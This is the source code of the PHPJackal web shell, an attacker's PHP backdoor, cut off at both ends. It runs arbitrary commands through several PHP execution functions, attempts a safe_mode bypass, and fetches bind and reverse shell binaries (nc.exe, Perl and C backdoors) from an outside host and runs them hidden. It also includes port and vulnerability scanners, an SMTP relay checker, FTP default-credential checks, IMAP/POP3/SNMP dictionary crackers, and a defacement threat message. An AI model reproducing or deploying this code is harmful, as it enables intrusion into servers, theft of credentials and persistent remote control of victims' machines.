"; $intro=" Script: ".str_repeat("-=-",25)." Name: PHPJackal Version: $v Author: ".str_repeat("-=-",25)." Name: NetJackal Country: Iran Website: http://netjackal.by.ru Email: nima_501@yahoo.com $et"; $footer="${msgbox}PHPJackal v$v - Powered By NetJackal$et"; $hcwd=""; $t = " "; $crack=" Dictionary: Dictionary type: Simple (P)Combo (U:P) Username: Server: $hcwd "; function namE(){ $name=''; srand((double)microtime()*100000); for ($i=0;$i<=rand(3,10);$i++){ $name.=chr(rand(97,122)); } return $name; } function whereistmP(){ $uploadtmp=ini_get('upload_tmp_dir'); $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP'); if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp'; if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp'; if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp'; if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp; if(is_dir($envtmp) && is_writable($envtmp))return $envtmp; return "."; } function shelL($command){ global $windows,$disablefunctions; $exec = '';$output= ''; $dep[]=array('pipe','r');$dep[]=array('pipe','w'); if(is_callable('passthru') && !strstr($disablefunctions,'passthru')){ @ob_start();passthru($command);$exec=@ob_get_contents();@ob_clean();@ob_end_clean();} elseif(is_callable('system') && !strstr($disablefunctions,'system')){$tmp = @ob_get_contents(); @ob_clean();system($command) ; $output = @ob_get_contents(); @ob_clean(); $exec= $tmp; } elseif(is_callable('exec') && !strstr($disablefunctions,'exec')) {exec($command,$output);$output = join("\n",$output);$exec= $output;} elseif(is_callable('shell_exec') && !strstr($disablefunctions,'shell_exec')){$exec= shell_exec($command);} elseif(is_resource($output=popen($command,"r"))) {while(!feof($output)){$exec= fgets($output);}pclose($output);} elseif(is_resource($res=proc_open($command,$dep,$pipes))){while(!feof($pipes[1])){$line = fgets($pipes[1]); $output.=$line;}$exec= $output;proc_close($res);} elseif ($windows && is_object($ws = new COM("WScript.Shell"))){$dir=(isset($_SERVER["TEMP"]))?$_SERVER["TEMP"]:ini_get('upload_tmp_dir') ;$name = $_SERVER["TEMP"].namE();$ws->Run("cmd.exe /C $command >$name", 0, true);$exec = file_get_contents($name);unlink($name);} return $exec; } function downloadiT($get,$put){ $fo=@strtolower(ini_get('allow_url_fopen')); if($fo || $fo=='on')$con=file_get_contents($get); else{ $u=parse_url($get); $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/'; $url=fsockopen($host, 80, $en, $es, 12); fputs($url, "GET $file HTTP/1.0\r\nAccept-Encoding: text\r\nHost: $host\r\nReferer: $host\r\nUser-Agent: Mozilla/5.0 (compatible; Konqueror/3.1; FreeBSD)\r\n\r\n"); $tmp=$con=''; while($tmp!="\r\n")$tmp=fgets($url); while(!feof($url))$con.=fgets($url); } $mk=file_put_contents($put,$con); if($mk)return 1; return 0; } function smtplogiN($addr,$user,$pass,$timeout){ $sock=fsockopen($addr,25,$n,$s,$timeout); if(!$sock)return -1; fread($sock,1024); fputs($sock,'ehlo '.namE()."\r\n"); $res=substr(fgets($sock,512),0,1); if($res!='2')return 0; fgets($sock,512);fgets($sock,512);fgets($sock,512); fputs($sock,"AUTH LOGIN\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='334')return 0; fputs($sock,base64_encode($user)."\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='334')return 0; fputs($sock,base64_encode($pass)."\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='235')return 0; return 1; } function checksmtP($host,$timeout){ $from=strtolower(namE())."@".strtolower(namE()).".com"; $sock=@fsockopen($host,25,$n,$s,$timeout); if(!$sock)return -1; $res=substr(fgets($sock,512),0,3); if($res!='220')return 0; fputs($sock,'HELO '.namE()."\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; fputs($sock,"MAIL FROM: <$from>\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; fputs($sock,"RCPT TO: \r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; fputs($sock,"DATA\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='354')return 0; fputs($sock,"From: ".namE()." ".namE()." <$from>\r\nSubject: ".namE()."\r\nMIME-Version: 1.0\r\nContent-Type: text/plain;\r\n\r\n".namE().namE().namE()."\r\n.\r\n"); $res=substr(fgets($sock,512),0,3); if($res!='250')return 0; return 1; } function check_urL($url,$method,$search,$timeout){ if(empty($search))$search='200'; $u=parse_url($url); $method=strtoupper($method); $host=$u['host'];$file=(!empty($u['path']))?$u['path']:'/'; $data=(!empty($u['query']))?$u['query']:''; if(!empty($data))$data="?$data"; $sock=@fsockopen($host,80,$en,$es,$timeout); if($sock){ fputs($sock,"$method $file$data HTTP/1.0\r\n"); fputs($sock,"Host: $host\r\n"); if($method=='GET')fputs($sock,"\r\n"); elseif($method='POST')fputs($sock,"Content-Type: application/x-www-form-urlencoded\r\nContent-length: ".strlen($data)."\r\nAccept-Encoding: text\r\nConnection: close\r\n\r\n$data"); else return 0; if($search=='200')if(substr(fgets($sock),0,3)=="200"){fclose($sock);return 1;}else {fclose($sock);return 0;} while(!feof($sock)){ $res=trim(fgets($sock)); if(!empty($res))if(strstr($res,$search)){fclose($sock);return 1;} } fclose($sock); } return 0; } function get_sw_namE($host,$timeout){ $sock=@fsockopen($host,80,$en,$es,$timeout); if($sock){ $page=namE().namE(); fputs($sock,"GET /$page HTTP/1.0\r\n\r\n"); while(!feof($sock)){ $con=fgets($sock); if(strstr($con,'Server:')){$ser=substr($con,strpos($con,' ')+1);return $ser;} } fclose($sock); return -1; }return 0; } function snmpchecK($ip,$com,$timeout){ $res=0; $n=chr(0x00); $packet=chr(0x30).chr(0x26).chr(0x02).chr(0x01). chr(0x00). chr(0x04). chr(strlen($com)). $com. chr(0xA0). chr(0x19). chr(0x02). chr(0x01). chr(0x01). chr(0x02). chr(0x01). $n. chr(0x02). chr(0x01). $n. chr(0x30). chr(0x0E). chr(0x30). chr(0x0C). chr(0x06). chr(0x08). chr(0x2B). chr(0x06). chr(0x01). chr(0x02). chr(0x01). chr(0x01). chr(0x01). $n. chr(0x05). $n; $sock=@fsockopen("udp://$ip",161); socket_set_timeout($sock,$timeout); @fputs($sock,$packet); socket_set_timeout($sock,$timeout); $res=fgets($sock); fclose($sock); return $res; } $safemode=(@ini_get('safe_mode') or strtolower(@ini_get('safe_mode')) == 'on')?'ON':'OFF'; if($safemode=="ON"){@ini_restore("safe_mode");@ini_restore("open_basedir");} $disablefunctions = @ini_get('disable_functions'); if (!function_exists("str_repeat")){ function str_repeat($str,$c){ $r=""; for($i=0; $i < $cu; $i++)$r.=$str; return $r; } } function brshelL(){ global $errorbox, $windows,$et,$hcwd; $_REQUEST['C']=(isset($_REQUEST['C']))?$_REQUEST['C']:0; $addr='http://netjackal.by.ru/backdoor'; $error="$errorbox Can not make backdoor file, go to writeable folder.$et"; $n=namE(); if(!$windows)$n=".$n"; $d=whereistmP(); $name=$d.DIRECTORY_SEPARATOR.$n; $perl=(!$windows && shelL('which perl'))?$perl=shelL('which perl'):'perl'; $c=($_REQUEST['C'])?1:0; if (!empty($_REQUEST['port']) && ($_REQUEST['port']<=65535) && ($_REQUEST['port']>=1) ){ $port=(int)$_REQUEST['port']; if($windows){ if($c){ $name.=".exe"; $bd=downloadiT("$addr/nc.exe",$name); shelL("attrib +H $name"); if(!$bd)echo $error;else shelL("$name -L -p $port -e cmd.exe"); }else{ $name = $name.".pl"; $bd=downloadiT("$addr/winbind.pl",$name); shelL("attrib +H $name"); if(!$bd)echo $error;else shelL("perl.exe $name $port"); } } else{ if($c){ $bd=downloadiT("$addr/bind.c",$name); if (!$bd) echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $port &"); }else{ $bd=downloadiT("$addr/bind.pl",$name); if (!$bd)echo $error; else shelL("cd $d;$perl $n $port &"); echo "Backdoor is waiting for you on $port. "; } } } elseif(!empty($_REQUEST['rport']) && ($_REQUEST['rport']<=65535) && ($_REQUEST['rport']>=1) && !empty($_REQUEST['ip'])){ $ip=$_REQUEST['ip']; $port=(int)$_REQUEST['rport']; if($windows){ if($c){ $name.='.exe'; $bd=downloadiT("$addr/nc.exe",$name); shelL("attrib +H $name"); if(!$bd)echo $error;else shelL("$name $ip $port -e cmd.exe"); }else{ $name = $name.".pl"; $bd=downloadiT("$addr/winrc.pl",$name); shelL("attrib +H $name"); if (!$bd)echo $error; else shelL("perl.exe $name $ip $port"); } } else{ if($c){ $bd=downloadiT("$addr/rc.c",$name); if(!$bd) echo $error;else shelL("cd $d;gcc -o $n $n.c;chmod +x ./$n;./$n $ip $port &"); }else{ $bd=downloadiT("$addr/rc.pl",$name); if(!$bd)echo $error;else shelL("cd $d;$perl $n $ip $port &"); } } echo "Done!";} else{echo " Bind shelL: Port: Type: PERL"; if($windows)echo "EXE"; else echo "C";echo" $hcwd Reverse shelL: IP: Port: Type: PERL"; if($windows)echo "EXE"; else echo "C";echo" $hcwd $et";}} function showimagE($img){ echo "";} function editoR($file){ global $errorbox,$et,$hcwd; if (is_file($file)){ if (!is_readable($file)){echo "$errorbox File is not readable$et ";} if (!is_writeable($file)){echo "$errorbox File is not writeable$et ";} $data = file_get_contents($file); echo " $hcwd "; echo htmlspecialchars($data); echo " "; } else {echo " $hcwd "; } echo "$hcwd "; } function webshelL(){ global $windows,$hcwd; if($windows){ $alias="Display open portsList of processesSystem informationIP configurationGet MAC addressServices listMachines in domainUsers listGroup policyTurn off the server"; } else{ $alias="Display open portsShow last 250 logged in usersDownloadersFind world-writable directoriesFind world-writable directories(in current directory)Find world-writable filesFind world-writable files(in current directory)Find files with SUID bit setFind files with SGID bit setFind .htpasswd filesFind .bash_history filesView syslog.confView hostsList of processes"; if(is_dir('/etc/valiases'))$alias.="List of Cpanel`s domains(valiases)";if(is_dir('/etc/vdomainaliases'))$alias.="List Cpanel`s domains(vdomainaliases)";if(file_exists('/var/cpanel/accounting.log'))$alias.="Display Cpanel`s log"; if(is_dir('/var/spool/mail/'))$alias.="Mailboxes list"; } echo " Location: Web Shell: "; if (!empty($_REQUEST['cmd'])) echo shelL($_REQUEST['cmd']); echo" $hcwd $alias$hcwd "; } function maileR(){ global $msgbox,$et,$hcwd; $cwd= getcwd(); if (!empty($_REQUEST['subject'])&&!empty($_REQUEST['body'])&&!empty($_REQUEST['from'])&&!empty($_REQUEST['to'])){ $to=$_REQUEST['to'];$from=$_REQUEST['from'];$subject=$_REQUEST['subject'];$body=$_REQUEST['body']; if (!mail($to,$subject,$body,"From: $from"))break; echo "$msgboxMail sent! $et"; } echo " $hcwd Mailer: SMTP ".ini_get('SMTP')." (".ini_get('smtp_port').") From: $hcwd To: Subject: Body: Admin, your system has been hacked! if you don`t seCure it, next time i`ll format your box. $et"; } function scanneR(){ global $hcwd; if (!empty($_SERVER["SERVER_ADDR"])) $host=$_SERVER["SERVER_ADDR"];else $host ="127.0.0.1"; $udp=(empty($_REQUEST['udp']))?0:1;$tcp=(empty($_REQUEST['tcp']))?0:1; if (($udp||$tcp) && !empty($_REQUEST['target']) && !empty($_REQUEST['fromport']) && !empty($_REQUEST['toport']) && !empty($_REQUEST['timeout']) && !empty($_REQUEST['portscanner'])){ $target=$_REQUEST['target'];$from=(int) $_REQUEST['fromport'];$to=(int)$_REQUEST['toport'];$timeout=(int)$_REQUEST['timeout'];$nu = 0; echo "Port scanning started against ".htmlspecialchars($target).": "; $start=time(); for($i=$from;$i<=$to;$i++){ if($tcp){ if (checkthisporT($target,$i,$timeout)){ $nu++; $ser=""; if(getservbyport($i,"tcp"))$ser="(".getservbyport($i,"tcp").")"; echo "$nu) $i $ser (Connect) [TCP] "; } } if($udp)if(checkthisporT($target,$i,$timeout,1)){$nu++;$ser="";if(getservbyport($i,"udp"))$ser="(".getservbyport($i,"udp").")";echo "$nu) $i $ser [UDP] ";} flusheR(); } $time=time()-$start; echo "Done! ($time seconds)"; } elseif (!empty($_REQUEST['securityscanner'])){ echo ""; $start=time(); $from=$_REQUEST['from']; $to=(int)$_REQUEST['to']; $timeout=(int)$_REQUEST['timeout']; $f = substr($from,strrpos($from,".")+1); $from = substr($from,0,strrpos($from,".")); if(!empty($_REQUEST['httpscanner'])){ echo "Loading webserver bug list..."; flusheR(); $buglist=whereistmP().DIRECTORY_SEPARATOR.namE(); $dl=@downloadiT('http://www.cirt.net/nikto/UPDATES/1.36/scan_database.db',$buglist); if($dl){$file=file($buglist);echo "Done! scanning started. ";}else echo "Failed!!! scanning started without webserver security testing... "; flusheR(); }else {$fr=htmlspecialchars($from); echo "Scanning $fr.$f-$fr.$to: ";} for($i=$f;$i<=$to;$i++){ $output=0; $ip="$from.$i"; if(!empty($_REQUEST['nslookup'])){ $hn=gethostbyaddr($ip); if($hn!=$ip)echo "$ip [$hn] ";} flusheR(); if(!empty($_REQUEST['ipscanner'])){ $port=$_REQUEST['port']; if(strstr($port,","))$p=explode(",",$port);else $p[0]=$port; $open=$ser=""; foreach($p as $po){ $scan=checkthisporT($ip,$po,$timeout); if ($scan){ $ser=""; if($ser=getservbyport($po,"tcp"))$ser="($ser)"; $open.=" $po$ser "; } } if($open){echo "$ip) Open ports:$open ";$output=1;} flusheR(); } if(!empty($_REQUEST['httpbanner'])){ $res=get_sw_namE($ip,$timeout); if($res){ echo "$ip) Webserver software: "; if($res==-1)echo "Unknow"; else echo $res; echo " "; $output=1; } flusheR(); } if(!empty($_REQUEST['httpscanner'])){ if(checkthisporT($ip,80,$timeout) && !empty($file)){ $admin=array('/admin/','/adm/'); $users=array('adm','bin','daemon','ftp','guest','listen','lp','mysql','noaccess','nobody','nobody4','nuucp','operator','root','smmsp','smtp','sshd','sys','test','unknown','uucp','web','www'); $nuke=array('/','/postnuke/','/postnuke/html/','/modules/','/phpBB/','/forum/'); $cgi=array('/cgi.cgi/','/webcgi/','/cgi-914/','/cgi-915/','/bin/','/cgi/','/mpcgi/','/cgi-bin/','/ows-bin/','/cgi-sys/','/cgi-local/','/htbin/','/cgibin/','/cgis/','/scripts/','/cgi-win/','/fcgi-bin/','/cgi-exe/','/cgi-home/','/cgi-perl/'); foreach ($file as $v){ $vuln=array(); $v=trim($v); if(!$v || $v{0}=='#')continue; $v=str_replace('","','^',$v); $v=str_replace('"','',$v); $vuln=explode('^',$v); $page=$cqich=$nukech=$adminch=$userch=$vuln[1]; if(strstr($page,'@CGIDIRS')) foreach($cgi as $cg){ $cqich=str_replace('@CGIDIRS',$cg,$page); $url="http://$ip$cqich"; $res=check_urL($url,$vuln[3],$vuln[2],$timeout); if($res){$output=1;echo "$ip)".$vuln[4]." $url ";} flusheR(); } elseif(strstr($page,'@ADMINDIRS')) foreach ($admin as $cg){ $adminch=str_replace('@ADMINDIRS',$cg,$page); $url="http://$ip$adminch"; $res=check_urL($url,$vuln[3],$vuln[2],$timeout); if($res){$output=1;echo "$ip)".$vuln[4]." $url ";} flusheR(); } elseif(strstr($page,'@USERS')) foreach ($users as $cg){ $userch=str_replace('@USERS',$cg,$page); $url="http://$ip$userch"; $res=check_urL($url,$vuln[3],$vuln[2],$timeout); if($res){$output=1;echo "$ip)".$vuln[4]." $url ";} flusheR(); } elseif(strstr($page,'@NUKE')) foreach ($nuke as $cg){ $nukech=str_replace('@NUKE',$cg,$page); $url="http://$ip$nukech"; $res=check_urL($url,$vuln[3],$vuln[2],$timeout); if($res){$output=1;echo "$ip)".$vuln[4]." $url ";} flusheR(); } else{ $url="http://$ip$page"; $res=check_urL($url,$vuln[3],$vuln[2],$timeout); if($res){$output=1;echo "$ip)".$vuln[4]." $url ";} flusheR(); } } } } if(!empty($_REQUEST['smtprelay'])){ if(checkthisporT($ip,25,$timeout)){ $res=''; $res=checksmtP($ip,$timeout); if($res==1){echo "$ip) SMTP relay found. ";$output=1;}flusheR(); } } if(!empty($_REQUEST['snmpscanner'])){ if(checkthisporT($ip,161,$timeout,1)){ $com=$_REQUEST['com']; $coms=$res=""; if(strstr($com,","))$c=explode(",",$com);else $c[0]=$com; foreach ($c as $v){ $ret=snmpchecK($ip,$v,$timeout); if($ret)$coms .=" $v "; } if ($coms!=""){echo "$ip) SNMP FOUND: $coms ";$output=1;} flusheR(); } } if(!empty($_REQUEST['ftpscanner'])){ if(checkthisporT($ip,21,$timeout)){ $usps=explode(',',$_REQUEST['userpass']); foreach ($usps as $v){ $user=substr($v,0,strpos($v,':')); $pass=substr($v,strpos($v,':')+1); if($pass=='[BLANK]')$pass=''; $ftp=@ftp_connect($ip,21,$timeout); if ($ftp){ if(@ftp_login($ftp,$user,$pass)){$output=1;echo "$ip) FTP FOUND: ($user:$pass) $ip System type: ".ftp_systype($ftp)." ";} } flusheR(); } } } if($output)echo " "; flusheR(); } $time=time()-$start; echo "Done! ($time seconds)"; if(!empty($buglist))unlink($buglist); } else{ $chbox=(extension_loaded('sockets'))?"TCPUDP":""; echo " Port scanner: Target: From: To: Timeout: $chbox $hcwd "; $host = substr($host,0,strrpos($host,".")); echo " security scanner: From: NS lookup To: xxx.xxx.xxx.$hcwd Timeout: Port scanner: Get web banner Webserver security scanning   SMTP relay check FTP password: SNMP: "; } } function sysinfO(){ global $windows,$disablefunctions,$safemode; $cwd= getcwd(); $mil="$osn",$os); $os = str_replace($ker,"${mil}Linux+Kernel\">$ker",$os); $inpa=':'; }else{ $sam = $sysroot."\\system32\\config\\SAM"; $inpa=';'; $os = str_replace($osn,"${mil}MS+Windows\">$osn",$os); } $software=str_replace("Apache","${mil}Apache\">Apache",$_SERVER['SERVER_SOFTWARE']); echo ""; if ($windows){ echo ""; } else { echo ""; } $uip =(!empty($_SERVER['REMOTE_ADDR']))?$_SERVER['REMOTE_ADDR']:getenv('REMOTE_ADDR'); echo "";if (function_exists('curl_init')) echo "";echo " Server information: Server: ".$_SERVER["HTTP_HOST"]; if (!empty($_SERVER["SERVER_ADDR"])){ echo "(". $_SERVER["SERVER_ADDR"] .")";}echo " Operation system: $os$osver Web server application: $software CPU: $CPU Disk status: $disksize User domain: ";if (!empty($_SERVER['USERDOMAIN'])) echo $_SERVER['USERDOMAIN'];else echo "Unknow"; echo " User name: ";$cuser=get_current_user();if (!empty($cuser)) echo get_current_user();else echo "Unknow"; echo " Windows directory: $sysroot Sam file: ";if (is_readable(($sam)))echo "Readable"; else echo "Not readable";echo " Passwd file: "; if (is_readable('/etc/passwd')) echo "Readable"; else echo'Not readable';echo " Cpanel log file: "; if (file_exists("/var/cpanel/accounting.log")){if (is_readable("/var/cpanel/accounting.log")) echo "Readable"; else echo "Not readable";}else echo "Not found"; echo " ${mil}PHP\">PHP version: ".PHP_VERSION." (more...) Zend version: ";if (function_exists('zend_version')) echo "".zend_version()."";else echo "Not Found";echo " Include path: ".str_replace($inpa," ",DEFAULT_INCLUDE_PATH)." PHP Modules: ";$ext=get_loaded_extensions();foreach($ext as $v)echo $v." ";echo " Disabled functions: ";if(!empty($disablefunctions))echo $disablefunctions;else echo "Nothing"; echo" Safe mode: $safemode Open base dir: $basedir DBMS: ";$sq="";if(function_exists('mysql_connect')) $sq= "${mil}MySQL\">MySQL ";if(function_exists('mssql_connect')) $sq.= " ${mil}MSSQL\">MSSQL ";if(function_exists('ora_logon')) $sq.= " ${mil}Oracle\">Oracle ";if(function_exists('sqlite_open')) $sq.= " SQLite ";if(function_exists('pg_connect')) $sq.= " ${mil}PostgreSQL\">PostgreSQL ";if(function_exists('msql_connect')) $sq.= " mSQL ";if(function_exists('mysqli_connect'))$sq.= " MySQLi ";if(function_exists('ovrimos_connect')) $sq.= " Ovrimos SQL ";if ($sq=="") $sq= "Nothing"; echo "$sq cURL support: Enabled ";if(function_exists('curl_version')){$ver=curl_version();echo "(Version:". $ver['version']." OpenSSL version:". $ver['ssl_version']." zlib version:". $ver['libz_version']." host:". $ver['host'] .")";}echo " User information: IP: $uip Agent: ".getenv('HTTP_USER_AGENT')." "; } function checksuM($file){ global $et; echo " MD5: ".md5_file($file)." SHA1: ".sha1_file($file)."$et"; } function listdiR($cwd,$task){ $c= getcwd(); $dh = opendir($cwd); while ($cont=readdir($dh)){ if($cont=='.' || $cont=='..')continue; $adr = $cwd.DIRECTORY_SEPARATOR.$cont; switch ($task){ case '0':if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";break; case '1':if(is_writeable($adr))if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";break; case '2':if(is_file($adr) && is_writeable($adr))echo "[$adr]\n";break; case '3':if(is_dir($adr) && is_writeable($adr))echo "[$adr]\n";break; case '4':if(is_file($adr))echo "[$adr]\n";break; case '5':if(is_dir($adr))echo "[$adr]\n";break; case '6':if(preg_match("@".$_REQUEST['search']."@",$cont)){if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";}break; case '7':if(strstr($cont,$_REQUEST['search'])){if(is_file($adr))echo "[$adr]\n";if(is_dir($adr))echo "[$adr]\n";}break; } if (is_dir($adr)) listdiR($adr,$_REQUEST['task']); } } if (!function_exists("posix_getpwuid") && !strstr($disablefunctions,'posix_getpwuid')) {function posix_getpwuid($u) {return 0;}} if (!function_exists("posix_getgrgid") && !strstr($disablefunctions,'posix_getgrgid')) {function posix_getgrgid($g) {return 0;}} function filemanager(){ global $windows,$msgbox,$errorbox,$t,$et,$hcwd; $cwd= getcwd(); $table = ""; $td1n=" "; $td2m=" "; $td1i=" "; $td2i=" "; $tdnr=" "; $tdw=" "; if (!empty($_REQUEST['task'])){ if (!empty($_REQUEST['search'])) $_REQUEST['task'] = 7; if (!empty($_REQUEST['re'])) $_REQUEST['task'] = 6; echo " "; listdiR($cwd,$_REQUEST['task']); echo " "; }else{ if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])|| !empty($_REQUEST['rN'])){ if (!empty($_REQUEST['cP']) || !empty($_REQUEST['mV'])){ $title="Destination"; $ad = (!empty($_REQUEST['cP']))?$_REQUEST['cP']:$_REQUEST['mV']; $dis =(!empty($_REQUEST['cP']))?'Copy':'Move'; }else{ $ad = $_REQUEST['rN']; $title ="New name"; $dis = "Rename"; } if (!!empty($_REQUEST['deS'])){ echo "$td1n$td2m$hcwd $title: "; }else{ if (!empty($_REQUEST['rN'])) renamE($ad,$_REQUEST['deS']); else{ copy($ad,$_REQUEST['deS']); if (!empty($_REQUEST['mV']))unlink($ad); } } } if (!empty($_REQUEST['deL'])) { if (is_file($_REQUEST['deL'])|| is_link($_REQUEST['deL'])) unlink($_REQUEST['deL']);elseif(is_dir($_REQUEST['deL'])) { $dh = opendir($_REQUEST['deL']); $d=""; while ($cont=readdir($dh)){$d++;} if ($d>2) echo "$errorbox\"".htmlspecialchars($_REQUEST['del'])."\" is not empty! ";else rmdir($_REQUEST['del']);}} if (!empty($_FILES['uploadfile'])){ move_uploaded_file($_FILES['uploadfile']['tmp_name'],$_FILES['uploadfile']['name']); echo "$msgboxUploaded! File name: ".$_FILES['uploadfile']['name']." File size: ".$_FILES['uploadfile']['size']. "$et "; } $select = "--------Drives: "; for ($i=66;$i<=90;$i++){$drive= chr($i).':'; if (is_dir($drive."\\")){$vol=shelL("vol $drive");if(empty($vol))$vol=$drive;echo " $drive\\";} } echo $et; } echo "$table Location: "; $file=array();$dir=array();$link=array(); if($dirhandle = opendir($cwd)){ while ($cont=readdir($dirhandle)){ if (is_dir($cwd.DIRECTORY_SEPARATOR.$cont)) $dir[]= $cont; elseif (is_file($cwd.DIRECTORY_SEPARATOR.$cont)) $file[]=$cont; else $link[]=$cont; } closedir($dirhandle); sort($file);sort($dir);sort($link); echo ""; $i=0; foreach($dir as $dn){ echo ""; $i++; $own="Unknow"; $owner=posix_getpwuid(fileowner($dn)); $mdate=date("Y/m/d H:i:s",filemtime($dn)); $adate=date("Y/m/d H:i:s",fileatime($dn)); $diraction = $select.hlinK("seC=fm&workingdiR=".realpath($dn))."\">OpenRenameRemove"; if ($owner) $own = "".$owner['name'].""; if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} if (is_writeable($dn)) echo $tdw;elseif (!is_readable($dn)) echo $tdnr;else echo $cl2; echo ""; if (strlen($dn)>45)echo substr($dn,0,42)."...";else echo $dn;echo ""; echo $cl1."$own"; echo $cl1."$mdate"; echo $cl1."$adate"; echo "${cl1}D";if (is_readable($dn)) echo "R";if (is_writeable($dn)) echo "W";echo ""; echo "$cl1------"; echo $cl2.$diraction; echo "" ; flusheR(); } foreach($file as $fn){ echo ""; $i++; $own = "Unknow"; $owner = posix_getpwuid(fileowner($fn)); $fileaction=$select.hlinK("seC=openit&namE=$fn&workingdiR=$cwd")."\">OpenEditDownloadHex viewimageIncludeChecksumCopyMoveRenameRemove"; $mdate = date("Y/m/d H:i:s",filemtime($fn)); $adate = date("Y/m/d H:i:s",fileatime($fn)); if ($owner) $own = "".$owner['name'].""; $size = showsizE(filesize($fn)); if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} if (is_writeable($fn)) echo $tdw;elseif (!is_readable($fn)) echo $tdnr;else echo $cl2; echo ""; if (strlen($fn)>45)echo substr($fn,0,42)."...";else echo $fn;echo ""; echo $cl1."$own"; echo $cl1."$mdate"; echo $cl1."$adate"; echo "$cl1";if (is_readable($fn)) echo "R";if (is_writeable($fn)) echo "W";if (is_executable($fn)) echo "X";if (is_uploaded_file($fn)) echo "U"; echo ""; echo "$cl1$size"; echo $td2m.$fileaction; echo "" ; flusheR(); } foreach($link as $ln){ $own = "Unknow"; $i++; $owner = posix_getpwuid(fileowner($ln)); $linkaction=$select.hlinK("seC=openit&namE=$ln&workingdiR=$ln")."\">OpenEditDownloadHex viewimageIncludeChecksumCopyMoveRenameRemove"; $mdate = date("Y/m/d H:i:s",filemtime($ln)); $adate = date("Y/m/d H:i:s",fileatime($ln)); if ($owner) $own = "".$owner['name'].""; echo ""; $size = showsizE(filesize($ln)); if (($i%2)==0){$cl1=$td1i;$cl2=$td1n;}else{$cl1=$td2i;$cl2=$td2m;} if (is_writeable($ln)) echo $tdw;elseif (!is_readable($ln)) echo $tdnr;else echo $cl2; echo ""; if (strlen($ln)>45)echo substr($ln,0,42)."...";else echo $ln;echo ""; echo $cl1."$own"; echo $cl1."$mdate"; echo $cl1."$adate"; echo "${cl1}L";if (is_readable($ln)) echo "R";if (is_writeable($ln)) echo "W";if (is_executable($ln)) echo "X"; echo ""; echo "$cl1$size"; echo $cl2.$linkaction; echo "" ; flusheR(); } } $dc = count($dir)-2; if($dc==-2)$dc=0; $fc = count($file); $lc = count($link); $total = $dc + $fc + $lc; echo "$table Name Owner Modification time Last change Info Size Actions Find:Regular expressions $hcwd $hcwdDisplay files and directories in current folderFind writable files and directories in current folderFind writable files in current folderFind writable directories in current folderDisplay all files in current folderDisplay all directories in current folder $et $td1n$td2m$hcwd$td1n Note: Max allowed file size to upload on this server is ".ini_get('upload_max_filesize')." Summery: Total: $total Directories: $dc Files: $fc Links: $lc Current directory status: "; if (is_readable($cwd)) echo "R";if (is_writeable($cwd)) echo "W" ;echo " $td1n$td2m$hcwd New: ${t}Upload: $et"; } } function imaplogiN($host,$username,$password){ $sock=fsockopen($host,143,$n,$s,5); $b=namE(); $l=strlen($b); if(!$sock)return -1; fread($sock,1024); fputs($sock,"$b LOGIN $username $password\r\n"); $res=fgets($sock,$l+4); if ($res == "$b OK")return 1;else return 0; fclose($sock); } function pop3logiN($server,$user,$pass){ $sock=fsockopen($server,110,$en,$es,5); if(!$sock)return -1; fread($sock,1024); fwrite($sock,"user $user\n"); $r=fgets($sock); if($r{0}=='-')return 0; fwrite($sock,"pass $pass\n"); $r=fgets($sock); fclose($sock); if($r{0}=='+')return 1; return 0; } function imapcrackeR(){ global $t,$et,$errorbox,$crack; if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ $target=$_REQUEST['target']; $type=$_REQUEST['combo']; $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; $dictionary=fopen($_REQUEST['dictionary'],'r'); if ($dictionary){ echo "Cracking ".htmlspecialchars($target)."... ";flusheR(); while(!feof($dictionary)){ if($type){ $combo=trim(fgets($dictionary)," \n\r"); $user=substr($combo,0,strpos($combo,':')); $pass=substr($combo,strpos($combo,':')+1); }else{ $pass=trim(fgets($dictionary)," \n\r"); } $imap=imaplogiN($target,$user,$pass); if($imap==-1){echo "$errorbox Can not connect to server.$et";break;}else{ if ($imap){echo "U: $user P: $pass ";if(!$type)break;}} flusheR(); } echo " Done"; fclose($dictionary); } else{ echo "$errorbox Can not open dictionary.$et"; } }else echo "${t}IMAP cracker:$crack"; } function snmpcrackeR(){ global $t,$et,$errorbox,$crack,$hcwd; if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ $target=$_REQUEST['target']; $dictionary=fopen($_REQUEST['dictionary'],'r'); if ($dictionary){ echo "Cracking ".htmlspecialchars($target)."... ";flusheR(); while(!feof($dictionary)){ $com=trim(fgets($dictionary)," \n\r"); $res=snmpchecK($target,$com,2); if($res)echo "$com "; flusheR(); } echo " Done"; fclose($dictionary); } else{ echo "$errorbox Can not open dictionary.$et"; } }else echo "${t}SNMP cracker: Dictionary: Server: "; } function pop3crackeR(){ global $t,$et,$errorbox,$crack; if (!empty($_REQUEST['target']) && !empty($_REQUEST['dictionary'])){ $target=$_REQUEST['target']; $type=$_REQUEST['combo']; $user=(!empty($_REQUEST['user']))?$_REQUEST['user']:""; $dictionary=fopen($_REQUEST['dictionary'],'r'); if ($dictionary){ echo "Cracking ".htmlspecialchars($target)."... ";flusheR(); while(!feof($dictionary)){ if($type){ $combo=trim(fgets($dictionary)," \n\r"); $user=substr($combo,0,strpos($combo,':')); 